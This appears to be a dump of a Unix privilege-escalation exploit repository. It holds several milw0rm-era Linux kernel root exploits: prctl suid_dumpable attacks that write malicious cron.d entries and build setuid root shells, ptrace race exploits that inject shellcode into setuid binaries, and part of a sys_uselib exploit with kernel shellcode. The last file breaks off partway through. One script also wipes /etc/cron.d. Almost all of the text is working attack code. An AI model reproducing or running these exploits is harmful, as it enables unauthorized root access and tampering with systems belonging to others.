struct stat st; 65 | 66 | /* print exploit information */ 67 | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); 68 | 69 | /* prepare the setuid() helper */ 70 | system(pwnage); 71 | 72 | /* set core size to unlimited */ 73 | corelimit.rlim_cur = RLIM_INFINITY; 74 | corelimit.rlim_max = RLIM_INFINITY; 75 | setrlimit(RLIMIT_CORE, &corelimit); 76 | 77 | /* let's create a fake logfile in /var/log */ 78 | if (!(pid = fork())) { 79 | chdir("/var/log"); 80 | prctl(PR_SET_DUMPABLE, 2); 81 | sleep(666); 82 | exit(1); 83 | } 84 | kill(pid, SIGSEGV); 85 | 86 | /* let's do the PR_SET_DUMPABLE magic */ 87 | if (!(pid = fork())) { 88 | chdir("/etc/logrotate.d"); 89 | prctl(PR_SET_DUMPABLE, 2); 90 | sleep(666); 91 | exit(1); 92 | } 93 | kill(pid, SIGSEGV); 94 | 95 | /* did it work? */ 96 | sleep(3); 97 | if ((stat("/var/log/core", &st) < 0) || 98 | (stat("/etc/logrotate.d/core", &st) < 0)) { 99 | fprintf(stderr, "Error: Not vulnerable? See comments.\n"); 100 | exit(1); 101 | } 102 | 103 | /* total pwnage */ 104 | fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); 105 | exit(0); 106 | } 107 | 108 | // milw0rm.com [2006-07-18] 109 | 110 | -------------------------------------------------------------------------------- /prct2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/prct2.zip -------------------------------------------------------------------------------- /prct3.c: -------------------------------------------------------------------------------- 1 | /* Linux >= 2.6.13 prctl kernel exploit 2 | * 3 | * (C) Julien TINNES 4 | * 5 | * If you read the Changelog from 2.6.13 you've probably seen: 6 | * [PATCH] setuid core dump 7 | * 8 | * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, 9 | * user setable argument to PR_SET_DUMPABLE. 10 | * 11 | * This flaw allows us to create a root owned coredump into any directory. 12 | * This is trivially exploitable. 13 | * 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | 27 | #define CROND "/etc/cron.d" 28 | #define BUFSIZE 2048 29 | 30 | 31 | struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; 32 | 33 | char crontemplate[]= 34 | "#/etc/cron.d/core suid_dumpable exploit\n" 35 | "SHELL=/bin/sh\n" 36 | "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" 37 | "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; 38 | 39 | char cronstring[BUFSIZE]; 40 | char fname[BUFSIZE]; 41 | 42 | struct timeval te; 43 | 44 | void sh(int sn) { 45 | execl(fname, fname, (char *) NULL); 46 | } 47 | 48 | 49 | int main(int argc, char *argv[]) { 50 | 51 | int nw, pid; 52 | 53 | if (geteuid() == 0) { 54 | printf("[+] getting root shell\n"); 55 | setuid(0); 56 | setgid(0); 57 | if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { 58 | perror("[-] execle"); 59 | return 1; 60 | } 61 | } 62 | 63 | printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); 64 | 65 | /* get our file name */ 66 | if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { 67 | perror("[-] readlink"); 68 | printf("This is not fatal, rewrite the exploit\n"); 69 | } 70 | 71 | if (signal(SIGUSR1, sh) == SIG_ERR) { 72 | perror("[-] signal"); 73 | return 1; 74 | } 75 | printf("[+] Installed signal handler\n"); 76 | 77 | /* Let us create core files */ 78 | setrlimit(RLIMIT_CORE, &myrlimit); 79 | if (chdir(CROND) == -1) { 80 | perror("[-] chdir"); 81 | return 1; 82 | } 83 | 84 | /* exploit the flaw */ 85 | if (prctl(PR_SET_DUMPABLE, 2) == -1) { 86 | perror("[-] prtctl"); 87 | printf("Is you kernel version >= 2.6.13 ?\n"); 88 | return 1; 89 | } 90 | 91 | printf("[+] We are suidsafe dumpable!\n"); 92 | 93 | /* Forge the string for our core dump */ 94 | nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); 95 | if (nw >= sizeof(cronstring)) { 96 | printf("[-] cronstring is too small\n"); 97 | return 1; 98 | } 99 | printf("[+] Malicious string forged\n"); 100 | 101 | if ((pid=fork()) == -1) { 102 | perror("[-] fork"); 103 | return 1; 104 | } 105 | 106 | if (pid == 0) { 107 | /* This is not the good way to do it ;) */ 108 | sleep(120); 109 | exit(0); 110 | } 111 | 112 | /* SEGFAULT the child */ 113 | printf("[+] Segfaulting child\n"); 114 | if (kill(pid, 11) == -1) { 115 | perror("[-] kill"); 116 | return 1; 117 | } 118 | if (gettimeofday(&te, NULL) == 0) 119 | printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); 120 | sleep(120); 121 | 122 | printf("[-] It looks like the exploit failed\n"); 123 | 124 | return 1; 125 | } 126 | 127 | // milw0rm.com [2006-07-12] 128 | 129 | -------------------------------------------------------------------------------- /prct3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/prct3.zip -------------------------------------------------------------------------------- /prct4.c: -------------------------------------------------------------------------------- 1 | /* 2 | * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ 3 | * 4 | * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability 5 | * Copyright (c) 2006 Marco Ivaldi 6 | * 7 | * The suid_dumpable support in Linux kernel 2.6.13 up to versions before 8 | * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial 9 | * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges 10 | * via the PR_SET_DUMPABLE argument of the prctl function and a program that 11 | * causes a core dump file to be created in a directory for which the user does 12 | * not have permissions (CVE-2006-2451). 13 | * 14 | * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! 15 | * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) 16 | * 17 | * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. 18 | * 19 | * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this 20 | * means that distributions that use a different configuration (namely Dillon's 21 | * crontab on Slackware Linux) can be vulnerable but not directly exploitable. 22 | * 23 | * Usage: 24 | * $ gcc raptor_prctl.c -o raptor_prctl -Wall 25 | * [exploit must be dinamically linked] 26 | * $ ./raptor_prctl 27 | * [...] 28 | * sh-3.00# 29 | * 30 | * Vulnerable platforms: 31 | * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] 32 | */ 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | 42 | #define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" 43 | #define INFO2 "Copyright (c) 2006 Marco Ivaldi " 44 | 45 | char payload[] = /* commands to be executed by privileged crond */ 46 | "\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; 47 | 48 | char pwnage[] = /* build setuid() helper to circumvent bash checks */ 49 | "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; 50 | 51 | int main(void) 52 | { 53 | int pid, i; 54 | struct rlimit corelimit; 55 | struct stat st; 56 | 57 | /* print exploit information */ 58 | fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); 59 | 60 | /* prepare the setuid() helper */ 61 | system(pwnage); 62 | 63 | /* set core size to unlimited */ 64 | corelimit.rlim_cur = RLIM_INFINITY; 65 | corelimit.rlim_max = RLIM_INFINITY; 66 | setrlimit(RLIMIT_CORE, &corelimit); 67 | 68 | /* let's do the PR_SET_DUMPABLE magic */ 69 | if (!(pid = fork())) { 70 | chdir("/etc/cron.d"); 71 | prctl(PR_SET_DUMPABLE, 2); 72 | sleep(666); 73 | exit(1); 74 | } 75 | kill(pid, SIGSEGV); 76 | 77 | /* did it work? */ 78 | sleep(3); 79 | if (stat("/etc/cron.d/core", &st) < 0) { 80 | fprintf(stderr, "Error: Not vulnerable? See comments.\n"); 81 | exit(1); 82 | } 83 | 84 | fprintf(stderr, "Ready to uncork the champagne? "); 85 | fprintf(stderr, "Please wait a couple of minutes;)\n"); 86 | 87 | /* wait for crond to execute our evil entry */ 88 | for (i = 0; i < 124; i += 2) { 89 | if (stat("/tmp/pwned", &st) < 0) { 90 | fprintf(stderr, "\nError: Check /tmp/pwned!\n"); 91 | exit(1); 92 | } 93 | if (st.st_uid == 0) 94 | break; 95 | fprintf(stderr, "."); 96 | sleep(2); 97 | } 98 | 99 | /* timeout reached? */ 100 | if (i > 120) { 101 | fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); 102 | exit(1); 103 | } 104 | 105 | /* total pwnage */ 106 | fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); 107 | system("/tmp/pwned"); 108 | exit(0); 109 | } 110 | 111 | // milw0rm.com [2006-07-13] 112 | 113 | -------------------------------------------------------------------------------- /prct4.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/prct4.zip -------------------------------------------------------------------------------- /prct5.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # PRCTL local root exp By: Sunix 4 | # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp 5 | # tested on Intel(R) Xeon(TM) CPU 3.20GHz 6 | # kernel 2.6.9-22.ELsmp 7 | # maybe others ... 8 | # Tx to drayer & RoMaNSoFt for their clear code... 9 | # 10 | # zmia23@yahoo.com 11 | 12 | 13 | cat > /tmp/getsuid.c << __EOF__ 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; 24 | 25 | int main() { 26 | int child; 27 | struct rlimit corelimit; 28 | corelimit.rlim_cur = RLIM_INFINITY; 29 | corelimit.rlim_max = RLIM_INFINITY; 30 | setrlimit(RLIMIT_CORE, &corelimit); 31 | if ( !( child = fork() )) { 32 | chdir("/etc/cron.d"); 33 | prctl(PR_SET_DUMPABLE, 2); 34 | sleep(200); 35 | exit(1); 36 | } 37 | kill(child, SIGSEGV); 38 | sleep(120); 39 | } 40 | __EOF__ 41 | 42 | cat > /tmp/s.c << __EOF__ 43 | #include 44 | main(void) 45 | { 46 | setgid(0); 47 | setuid(0); 48 | system("/bin/sh"); 49 | system("rm -rf /tmp/s"); 50 | system("rm -rf /etc/cron.d/*"); 51 | return 0; 52 | } 53 | __EOF__ 54 | echo "wait aprox 4 min to get sh" 55 | cd /tmp 56 | cc -o s s.c 57 | cc -o getsuid getsuid.c 58 | ./getsuid 59 | ./s 60 | rm -rf getsuid* 61 | rm -rf s.c 62 | rm -rf prctl.sh 63 | 64 | # milw0rm.com [2006-07-14] 65 | 66 | -------------------------------------------------------------------------------- /prct6.c: -------------------------------------------------------------------------------- 1 | /* 2 | ** Author: h00lyshit 3 | ** Vulnerable: Linux 2.6 ALL 4 | ** Type of Vulnerability: Local Race 5 | ** Tested On : various distros 6 | ** Vendor Status: unknown 7 | ** 8 | ** Disclaimer: 9 | ** In no event shall the author be liable for any damages 10 | ** whatsoever arising out of or in connection with the use 11 | ** or spread of this information. 12 | ** Any use of this information is at the user's own risk. 13 | ** 14 | ** Compile: 15 | ** gcc h00lyshit.c -o h00lyshit 16 | ** 17 | ** Usage: 18 | ** h00lyshit 19 | ** 20 | ** Example: 21 | ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 22 | ** 23 | ** if y0u dont have one, make big file (~100MB) in /tmp with dd 24 | ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null 25 | ** 26 | */ 27 | 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | 43 | 44 | static struct exec ex; 45 | static char *e[256]; 46 | static char *a[4]; 47 | static char b[512]; 48 | static char t[256]; 49 | static volatile int *c; 50 | 51 | 52 | /* h00lyshit shell code */ 53 | __asm__ (" __excode: call 1f \n" 54 | " 1: mov $23, %eax \n" 55 | " xor %ebx, %ebx \n" 56 | " int $0x80 \n" 57 | " pop %eax \n" 58 | " mov $cmd-1b, %ebx \n" 59 | " add %eax, %ebx \n" 60 | " mov $arg-1b, %ecx \n" 61 | " add %eax, %ecx \n" 62 | " mov %ebx, (%ecx) \n" 63 | " mov %ecx, %edx \n" 64 | " add $4, %edx \n" 65 | " mov $11, %eax \n" 66 | " int $0x80 \n" 67 | " mov $1, %eax \n" 68 | " int $0x80 \n" 69 | " arg: .quad 0x00, 0x00 \n" 70 | " cmd: .string \"/bin/sh\" \n" 71 | " __excode_e: nop \n" 72 | " .global __excode \n" 73 | " .global __excode_e \n" 74 | ); 75 | 76 | 77 | 78 | extern void (*__excode) (void); 79 | extern void (*__excode_e) (void); 80 | 81 | 82 | void 83 | error (char *err) 84 | { 85 | perror (err); 86 | fflush (stderr); 87 | exit (1); 88 | } 89 | 90 | 91 | /* exploit this shit */ 92 | void 93 | exploit (char *file) 94 | { 95 | int i, fd; 96 | void *p; 97 | struct stat st; 98 | 99 | printf ("\ntrying to exploit %s\n\n", file); 100 | fflush (stdout); 101 | chmod ("/proc/self/environ", 04755); 102 | c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); 103 | memset ((void *) c, 0, 4096); 104 | 105 | /* slow down machine */ 106 | fd = open (file, O_RDONLY); 107 | fstat (fd, &st); 108 | p = 109 | (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); 110 | if (p == MAP_FAILED) 111 | error ("mmap"); 112 | prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); 113 | sprintf (t, "/proc/%d/environ", getpid ()); 114 | sched_yield (); 115 | execve (NULL, a, e); 116 | madvise (0, 0, MADV_WILLNEED); 117 | i = fork (); 118 | 119 | /* give it a try */ 120 | if (i) 121 | { 122 | (*c)++; 123 | !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise"); 124 | prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); 125 | sched_yield (); 126 | } 127 | else 128 | { 129 | nice(10); 130 | while (!(*c)); 131 | sched_yield (); 132 | execve (t, a, e); 133 | error ("failed"); 134 | } 135 | 136 | waitpid (i, NULL, 0); 137 | exit (0); 138 | } 139 | 140 | 141 | int 142 | main (int ac, char **av) 143 | { 144 | int i, j, k, s; 145 | char *p; 146 | 147 | memset (e, 0, sizeof (e)); 148 | memset (a, 0, sizeof (a)); 149 | a[0] = strdup (av[0]); 150 | a[1] = strdup (av[0]); 151 | a[2] = strdup (av[1]); 152 | 153 | if (ac < 2) 154 | error ("usage: binary "); 155 | if (ac > 2) 156 | exploit (av[2]); 157 | printf ("\npreparing"); 158 | fflush (stdout); 159 | 160 | /* make setuid a.out */ 161 | memset (&ex, 0, sizeof (ex)); 162 | N_SET_MAGIC (ex, NMAGIC); 163 | N_SET_MACHTYPE (ex, M_386); 164 | s = ((unsigned) &__excode_e) - (unsigned) &__excode; 165 | ex.a_text = s; 166 | ex.a_syms = -(s + sizeof (ex)); 167 | 168 | memset (b, 0, sizeof (b)); 169 | memcpy (b, &ex, sizeof (ex)); 170 | memcpy (b + sizeof (ex), &__excode, s); 171 | 172 | /* make environment */ 173 | p = b; 174 | s += sizeof (ex); 175 | j = 0; 176 | for (i = k = 0; i < s; i++) 177 | { 178 | if (!p[i]) 179 | { 180 | e[j++] = &p[k]; 181 | k = i + 1; 182 | } 183 | } 184 | 185 | /* reexec */ 186 | getcwd (t, sizeof (t)); 187 | strcat (t, "/"); 188 | strcat (t, av[0]); 189 | execve (t, a, e); 190 | error ("execve"); 191 | return 0; 192 | } 193 | 194 | // milw0rm.com [2006-07-15] 195 | 196 | -------------------------------------------------------------------------------- /prct6.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/prct6.zip -------------------------------------------------------------------------------- /ptrace-kmod.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/ptrace-kmod.zip -------------------------------------------------------------------------------- /ptrace.c: -------------------------------------------------------------------------------- 1 | /* by Nergal */ 2 | #include 3 | #include 4 | #include 5 | #include 6 | void ex_passwd(int fd) 7 | { 8 | char z; 9 | if (read(fd, &z, 1) <= 0) { 10 | perror("read:"); 11 | exit(1); 12 | } 13 | execl("/usr/bin/passwd", "passwd", 0); 14 | perror("execl"); 15 | exit(1); 16 | } 17 | void insert(int pid) 18 | { 19 | char buf[100]; 20 | char *ptr = buf; 21 | sprintf(buf, "exec ./insert_shellcode %i\n", pid); 22 | while (*ptr && !ioctl(0, TIOCSTI, ptr++)); 23 | } 24 | 25 | 26 | main(int argc, char **argv) 27 | { 28 | int res, fifo; 29 | int status; 30 | int pid, n; 31 | int pipa[2]; 32 | char buf[1024]; 33 | pipe(pipa); 34 | switch (pid = fork()) { 35 | case -1: 36 | perror("fork"); 37 | exit(1); 38 | case 0: 39 | close(pipa[1]); 40 | ex_passwd(pipa[0]); 41 | default:; 42 | } 43 | 44 | 45 | res = ptrace(PTRACE_ATTACH, pid, 0, 0); 46 | if (res) { 47 | perror("attach"); 48 | exit(1); 49 | } 50 | res = waitpid(-1, &status, 0); 51 | if (res == -1) { 52 | perror("waitpid"); 53 | exit(1); 54 | } 55 | res = ptrace(PTRACE_CONT, pid, 0, 0); 56 | if (res) { 57 | perror("cont"); 58 | exit(1); 59 | } 60 | fprintf(stderr, "attached\n"); 61 | switch (fork()) { 62 | case -1: 63 | perror("fork"); 64 | exit(1); 65 | case 0: 66 | close(pipa[1]); 67 | sleep(1); 68 | insert(pid); 69 | do { 70 | n = read(pipa[0], buf, sizeof(buf)); 71 | } while (n > 0); 72 | if (n < 0) 73 | perror("read"); 74 | exit(0); 75 | default:; 76 | } 77 | close(pipa[0]); 78 | 79 | dup2(pipa[1], 2); 80 | close(pipa[1]); 81 | /* Decrystallizing reason */ 82 | setenv("LD_DEBUG", "libs", 1); 83 | /* With strength I burn */ 84 | execl("/usr/bin/newgrp", "newgrp", 0); 85 | } 86 | -------------------------------------------------------------------------------- /ptrace.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/ptrace.zip -------------------------------------------------------------------------------- /ptrace24.c: -------------------------------------------------------------------------------- 1 | /* 2 | ptrace24.c [ improved by sd@ircnet ] 3 | ~~~~~~~~~~ 4 | exploit for execve/ptrace race condition in Linux kernel up to 2.4.9 5 | 6 | Originally by Nergal. 7 | Improved by sd. 8 | 9 | This sploit doesn't need offset in victim binary 10 | coz were using regs.eip instead (shellcode is non-self modifying) 11 | 12 | It should work on openwall-patched kernels (but not on 13 | Openwall GNU Linux as Nergal mentioned in advisory) 14 | 15 | Use: 16 | cc ptrace24.c -o ptrace24 17 | ./ptrace24 18 | 19 | It gives instant root with any of: su, newgrp, screen [if +s] 20 | (assuming if no password requiered) just change #define TARGET. 21 | 22 | NOTE: This works only if it's executed on a tty [i.e. interactively]. 23 | */ 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | 37 | #define VICTIM "/usr/bin/passwd" 38 | #define TARGET "/usr/bin/newgrp" 39 | 40 | /* quite tricky shellcode, it doesn't need +W, so we can use it in .text */ 41 | /* setuid(0) + /bin/sh = 31 bytes*/ 42 | char sc[]= 43 | "\x6a\x17\x58\x31\xdb\xcd\x80\x31" 44 | "\xd2\x52\x68\x6e\x2f\x73\x68\x68" 45 | "\x2f\x2f\x62\x69\x89\xe3\x52\x53" 46 | "\x89\xe1\x8d\x42\x0b\xcd\x80"; 47 | 48 | void ex_passwd(int fd) 49 | { 50 | char z; 51 | dup2(2, 1); 52 | if (read(fd, &z, 1) <= 0) { 53 | perror("read:"); 54 | exit(1); 55 | } 56 | execl(VICTIM, VICTIM, 0); 57 | perror("execl"); 58 | exit(1); 59 | } 60 | 61 | void insert(char *us, int pid) 62 | { 63 | char buf[100]; 64 | char *ptr = buf; 65 | sprintf(buf, "exec %s %i\n", us, pid); 66 | while (*ptr && !ioctl(0, TIOCSTI, ptr++)); 67 | } 68 | 69 | int insert_shellcode(int pid) 70 | { 71 | int i, wpid; 72 | struct user_regs_struct regs; 73 | 74 | if (ptrace(PTRACE_GETREGS, pid, 0, ®s)) { 75 | perror("PTRACE_GETREGS"); 76 | exit(0); 77 | } 78 | 79 | for (i = 0; i <= strlen(sc) + 1; i += 4) 80 | ptrace(PTRACE_POKETEXT, pid, regs.eip + i, 81 | *(unsigned int *) (sc + i)); 82 | 83 | if (ptrace(PTRACE_SETREGS, pid, 0, ®s)) 84 | exit(0); 85 | 86 | if (ptrace(PTRACE_DETACH, pid, 0, 0)) 87 | exit(0); 88 | 89 | close(2); 90 | do { 91 | wpid = waitpid(-1, NULL, 0); 92 | if (wpid == -1) { 93 | perror("waitpid"); 94 | exit(1); 95 | } 96 | } while (wpid != pid); 97 | return 0; 98 | } 99 | 100 | int main(int argc, char *argv[]) 101 | { 102 | int res; 103 | int pid, n; 104 | int pipa[2]; 105 | 106 | if ((argc == 2) && ((pid = atoi(argv[1])))) { 107 | return insert_shellcode(pid); 108 | } 109 | 110 | pipe(pipa); 111 | 112 | switch (pid = fork()) { 113 | case -1: 114 | perror("fork"); 115 | exit(1); 116 | case 0: 117 | close(pipa[1]); 118 | ex_passwd(pipa[0]); 119 | default:; 120 | } 121 | 122 | res = ptrace(PTRACE_ATTACH, pid, 0, 0); 123 | 124 | if (res) { 125 | perror("attach"); 126 | exit(1); 127 | } 128 | 129 | res = waitpid(-1, NULL, 0); 130 | if (res == -1) { 131 | perror("waitpid"); 132 | exit(1); 133 | } 134 | 135 | res = ptrace(PTRACE_CONT, pid, 0, 0); 136 | if (res) { 137 | perror("cont"); 138 | exit(1); 139 | } 140 | 141 | fprintf(stderr, "attached\n"); 142 | 143 | switch (fork()) { 144 | case -1: 145 | perror("fork"); 146 | exit(1); 147 | case 0: 148 | close(pipa[1]); 149 | sleep(1); 150 | insert(argv[0], pid); 151 | do { 152 | char c; 153 | n = read(pipa[0], &c, 1); 154 | } while (n > 0); 155 | if (n < 0) 156 | perror("read"); 157 | exit(0); 158 | default:; 159 | } 160 | close(pipa[0]); 161 | 162 | dup2(pipa[1], 2); 163 | close(pipa[1]); 164 | /* Decrystallizing reason */ 165 | setenv("LD_DEBUG", "libs", 1); 166 | /* With strength I burn */ 167 | execl(TARGET, TARGET, 0); 168 | return 1; 169 | } 170 | -------------------------------------------------------------------------------- /ptrace24.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Unix-PrivEsc/d627304c1ced8c0da12a229393f7436216f19a5a/ptrace24.zip -------------------------------------------------------------------------------- /pwned.c: -------------------------------------------------------------------------------- 1 | /* 2 | We here at milw0rm love Paul (IhaQueR) Starzetz. 3 | /str0ke 4 | */ 5 | 6 | /* 7 | * pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. PRIVATE. 8 | * it's not the best one, the ldt approach is definitively better. 9 | * discovered may 2004. no longer private because lorian/cliph/ihaquer 10 | * can lick my balls. 11 | * (c) 2004 sd 12 | * requieres cca 1gb on fs. 13 | */ 14 | 15 | 16 | /* 17 | * first create fake vma structs. 18 | * 19 | * 20 | * let's have 3 threads, t1, t2 and t3. 21 | * t1 and t2 have common vm. 22 | * 23 | * t3: 24 | * - wait4sig (will come back from t2) 25 | * - write(fd3, bigmem, bigfile_size) 26 | * - exit() 27 | * t1: 28 | * - fd3 = empty file 29 | * - fd1 = bigfile, writing it took 16 secs 30 | * - bigmem = mmap(NULL, bigfile_size, fd1, 0); 31 | * - t3 = fork() 32 | * - t2 = clone() 33 | * - fd2 = munmap_file, size of ram. 34 | * - mumem = mmap(NULL, munmap_file_size, fd2) 35 | * - mmap(mumem, 4096, ANONYMOUS) // for extending do_brk check 36 | * - mmap lots of vmas 37 | * - close(fd2); 38 | * - create evil lib 39 | * - free lot of vmas 40 | * - sig @ t2 41 | * - evil_lib->do_munmap(mumem + 4096, munmap_file_size - 4096); 42 | * - sem = 1 43 | * - waitpid 44 | * t2: 45 | * - wait4sig 46 | * - sleep(100msec) 47 | * - mmap(mumem, fd3, 4096) // this is being protected by i_sem ! 48 | * - sendsig @ t3 49 | * - sleep(100msec) 50 | * - if (sem) error 51 | * - msync(mumem, 8192) - will wait for write() to finish. munmap finishes by that 52 | * time 53 | * - if (!sem) error 54 | * - if it does return we failed, otherwise shell. 55 | * 56 | */ 57 | 58 | #include 59 | #include 60 | #include 61 | #include 62 | 63 | #include 64 | #include 65 | #include 66 | #include 67 | 68 | #include 69 | #include 70 | #include 71 | #include 72 | #include 73 | #include 74 | 75 | 76 | 77 | #define __WCLONE 0x80000000 /* Wait only on non-SIGCHLD children */ 78 | 79 | #define ltime unsigned long long 80 | #define MEMSZ (70*1024*1024) 81 | 82 | #define MAGIC -123 83 | 84 | unsigned char shellcode[] = 85 | "\x60\xe8\x5f\x00\x00\x00\x30\x03\x98\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00 86 | \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 87 | \x50\x52\x49\x56\x41\x54\x45\x2a\x6b\x65\x72\x6e\x65\x6c\x20\x63\x61\x70\x20 88 | \x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x2c\x20\x28\x63\x29\x20\x32\x30\x30\x34 89 | \x20\x3c\x73\x64\x40\x68\x79\x73\x74\x65\x72\x69\x61\x2e\x73\x6b\x3e\x2a\x50 90 | \x52\x49\x56\x41\x54\x45\x5b\xbd\x00\xe0\xff\xff\x21\xe5\x81\x7d\x00\x00\x00 91 | \x00\xc0\x72\x03\x8b\x6d\x00\x8d\x4b\x08\xb8\xb8\x00\x00\x00\xcd\x80\x8b\x11 92 | \x8b\x71\x04\x8b\x79\x08\x83\xc5\x04\x39\x55\x00\x75\xf8\x39\x7d\x04\x75\xf3 93 | \x39\x75\x08\x75\xee\x31\xc0\x48\x89\x45\x00\x89\x45\x04\x89\x45\x08\xb8\xb8 94 | \x00\x00\x00\x8d\x4b\x14\xcd\x80\xff\x41\x04\x74\x0b\x89\x55\x00\x89\x7d\x04 95 | \x89\x75\x08\xeb\xc8\x61\xb8\x85\xff\xff\xff\xc3"; 96 | 97 | static ltime gtime() 98 | { 99 | struct timeval tv; 100 | gettimeofday(&tv, NULL); 101 | return tv.tv_sec * 1000000 + tv.tv_usec; 102 | } 103 | 104 | ltime lt; 105 | 106 | static void time_start() 107 | { 108 | lt = gtime(); 109 | } 110 | 111 | static void time_end() 112 | { 113 | printf("took %lu microseconds\n", gtime() - lt); 114 | } 115 | 116 | void core_stat() 117 | { 118 | int s; 119 | char buf[512]; 120 | char incore; 121 | unsigned long last = 0; 122 | FILE *f; 123 | 124 | sprintf(buf, "/proc/%d/maps", getpid()); 125 | f = fopen(buf, "rt"); 126 | while (fgets(buf, 512, f)) { 127 | unsigned int from, to; 128 | unsigned int i; 129 | 130 | if (sscanf(buf, "%x-%x", &from, &to) < 2) 131 | break; 132 | // printf("%p!%p\n", from, to); 133 | for (i = from; i < to; i += PAGE_SIZE) { 134 | mincore((void *) i, PAGE_SIZE, &incore); 135 | if (incore) { 136 | r:; 137 | if (!last) { 138 | printf("in core 0x%08x-", i); 139 | s = last = i; 140 | continue; 141 | } 142 | if (last + PAGE_SIZE == i) { 143 | // printf("(%p)", i); 144 | last = i; 145 | continue; 146 | } 147 | printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s); 148 | last = 0; 149 | goto r; 150 | } 151 | if (!last) 152 | continue; 153 | printf("0x%08x (%d)\n", last + PAGE_SIZE, last + PAGE_SIZE - s); 154 | last = 0; 155 | } 156 | } 157 | fclose(f); 158 | } 159 | 160 | 161 | #define SWAPFILE "TTswap" 162 | #define EATFILES "TTeatfiles" 163 | #define EATFILE "TTeatfile" 164 | #define SHAREFILE "TTsharefile" 165 | #define DUMMYFILE "TTdummyfile" 166 | #define EATTIME 10 167 | #define LIBFILE "TTlib" 168 | 169 | /* number of vma struct fill */ 170 | #define VMAFILL 15000 171 | 172 | /* how much pages to sync - 2 is enough */ 173 | #define NSYNC 2 174 | #define BASE (char *) 0x60000000 175 | #define DBASE (char *) 0x80001000 176 | #define EPAGE (char *) 0x80000000 177 | 178 | #define MAPSTEP 64 * 4096 179 | 180 | #if 1 181 | #define DEBUG(x...) { printf("%s():", __func__); printf(x); printf("\n"); } 182 | #else 183 | #define DEBUG(x...) 184 | #endif 185 | 186 | #define sendsig(pid) kill(pid, SIGUSR1) 187 | #define wait4sig() 